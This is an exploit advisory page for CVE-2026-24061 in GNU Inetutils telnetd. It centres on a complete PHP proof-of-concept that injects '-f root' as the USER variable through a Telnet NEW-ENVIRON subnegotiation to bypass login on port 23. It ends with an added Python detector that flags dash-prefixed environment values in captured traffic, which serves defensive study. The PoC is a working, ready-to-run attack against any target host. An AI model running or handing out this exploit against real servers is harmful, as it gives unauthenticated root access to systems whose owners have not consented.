
GNU Inetutils 2.7 Authentication Bypass

16 Feb 2026 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

Proof of concept for GNU Inetutils Telnet authentication bypass CVE-2026-24061.

=============================================================================================================================================
    | # Title     : GNU Inetutils Telnet Authentication Bypass PHP Proof of Concept                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://www.gnu.org/software/inetutils/                                                                                     |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/215519/ & CVE-2026-24061
    
    [+] Summary    : This PHP script is a PoC demonstrating a potential authentication bypass vulnerability in GNU Inetutils Telnet server identified as CVE-2026-24061.
    
    [+] The exploit works by:
    
    Establishing a TCP connection to the target Telnet service (default port 23).
    
    Crafting a malicious Telnet NEW-ENVIRON subnegotiation payload.
    
    Injecting a forged USER environment variable value.
    
    Attempting to manipulate the authentication process through improper handling of Telnet option negotiation.
    
    [+] The script:
    
    Connects to a specified host.
    
    Sends a specially crafted Telnet negotiation sequence.
    
    Attempts to bypass authentication by injecting -f root into the environment variable.
    
    Displays any response received from the target service.
    
    [+] POC :
    
    <?php
    
    set_time_limit(10);
    
    $host = $argv[1] ?? "127.0.0.1";
    $port = 23;
    $username = "root";
    
    echo "[*] Connecting to $host:$port...\n";
    
    $socket = fsockopen($host, $port, $errno, $errstr, 5);
    if (!$socket) {
        die("[-] Connection failed: $errstr ($errno)\n");
    }
    
    stream_set_timeout($socket, 2);
    
    $IAC  = chr(255);
    $SB   = chr(250);
    $SE   = chr(240);
    $WILL = chr(251);
    $DO   = chr(253);
    
    $OPT_NEW_ENVIRON = chr(39);
    $NEW_ENVIRON_IS  = chr(0);
    $NEW_ENVIRON_VAR = chr(0);
    $NEW_ENVIRON_VALUE = chr(1);
    
    fread($socket, 1024);
    
    $payload  = $IAC . $SB . $OPT_NEW_ENVIRON;
    $payload .= $NEW_ENVIRON_IS;
    $payload .= $NEW_ENVIRON_VAR . "USER";
    $payload .= $NEW_ENVIRON_VALUE . "-f " . $username;
    $payload .= $IAC . $SE;
    
    echo "[*] Sending authentication bypass...\n";
    fwrite($socket, $payload);
    fflush($socket);
    
    $response = fread($socket, 4096);
    
    if ($response) {
        echo "[+] Response received:\n";
        echo $response . "\n";
    } else {
        echo "[-] No response.\n";
    }
    
    fclose($socket);
    
    echo "[*] Done.\n";
    ?>
    
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================
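
A defensive counterpart to the PoC, added here and not part of the advisory: a Python parser for captured client-to-server Telnet bytes that extracts NEW-ENVIRON IS/INFO variables and flags any value beginning with `-`, the shape the PoC places in USER. The function names, the leading-dash heuristic and both sample byte strings are assumptions constructed for illustration.

```python
# Added example, not the advisory's code: names and heuristic are assumptions.
IAC, SB, SE, NEW_ENVIRON = 255, 250, 240, 39           # RFC 854 / RFC 1572
IS, INFO, VAR, VALUE, ESC, USERVAR = 0, 2, 0, 1, 2, 3  # RFC 1572 codes

def subnegotiations(stream: bytes):
    """Yield (option, body) for every complete IAC SB ... IAC SE block."""
    i, n = 0, len(stream)
    while i + 1 < n:
        if stream[i] != IAC:
            i += 1
        elif stream[i + 1] == SB and i + 2 < n:
            option, body, j = stream[i + 2], bytearray(), i + 3
            while j < n:
                if stream[j] == IAC and j + 1 < n and stream[j + 1] == SE:
                    yield option, bytes(body)
                    break
                if stream[j] == IAC and j + 1 < n and stream[j + 1] == IAC:
                    j += 1                      # IAC IAC encodes one literal 0xFF
                body.append(stream[j])
                j += 1
            i = j + 2
        else:                                   # WILL/WONT/DO/DONT carry an option byte
            i += 3 if 251 <= stream[i + 1] <= 254 else 2

def environ_pairs(body: bytes):
    """Parse an IS/INFO body into [(name, value)]; value is None if absent."""
    if not body or body[0] not in (IS, INFO):
        return []
    pairs, field, i = [], None, 1               # field: 0 = name, 1 = value
    while i < len(body):
        b = body[i]
        if b in (VAR, USERVAR):
            pairs.append(["", None])
            field = 0
        elif b == VALUE and pairs:
            pairs[-1][1], field = "", 1
        elif field is not None:
            if b == ESC and i + 1 < len(body):
                i += 1                          # ESC: next byte is literal data
            pairs[-1][field] += chr(body[i])
        i += 1
    return [tuple(p) for p in pairs]

def suspicious_values(stream: bytes):
    """Assumed heuristic: report NEW-ENVIRON values that start with '-'."""
    return [(k, v) for opt, body in subnegotiations(stream) if opt == NEW_ENVIRON
            for k, v in environ_pairs(body) if v and v.lstrip().startswith("-")]

BENIGN = b"\xff\xfb\x27\xff\xfa\x27\x00\x00USER\x01alice\xff\xf0"  # constructed sample
FLAGGED = b"\xff\xfa\x27\x00\x00USER\x01-f root\xff\xf0"           # constructed sample
```

Feed `suspicious_values` the reassembled client-to-server payload of a port 23 session (for example from a packet capture); a non-empty result is a reason to inspect that session.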

Vulners AI Score: 5.5 (Medium risk)
CVSS 3.1: 9.8
EPSS: 0.91526